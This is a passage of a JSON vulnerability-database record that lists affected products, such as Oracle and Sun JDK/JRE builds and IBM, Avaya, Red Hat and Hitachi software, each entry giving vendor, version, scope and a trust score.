"oracle", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "freeflow print server 93.e0.21c", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 91.d2.32", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 82.d1.44", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 81.d0.73", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 73.d2.33", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 73.c5.11", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise desktop sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "jrockit r28.2.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "virtualization engine ts7700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.8" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.7" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.6" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.4" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "java sdk sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr5-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "java sdk sr13-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "java sdk sr13-fp17", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "i v5r4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "4.0" }, { "model": "cosminexus server web edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-4" }, { "model": "cosminexus server standard edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-4" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "9.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "voice portal sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ir", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "conferencing standard edition sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r16.3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r15", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "call management system r17.0", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, 